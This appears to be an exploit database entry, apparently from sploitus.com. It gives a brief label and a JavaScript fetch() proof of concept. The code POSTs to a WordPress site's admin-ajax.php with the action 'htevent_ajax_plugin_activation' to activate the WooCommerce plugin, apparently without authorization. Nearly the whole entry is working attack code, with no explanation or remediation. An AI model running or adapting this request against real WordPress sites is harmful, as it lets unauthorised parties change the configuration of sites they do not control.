Share
## https://sploitus.com/exploit?id=WPEX-ID:451B47D5-7BD2-4A82-9C8E-FE6601BCD2AB
activate woocommerce plugin exploit:

fetch('http://localhost/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=htevent_ajax_plugin_activation&location=woocommerce/woocommerce.php',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));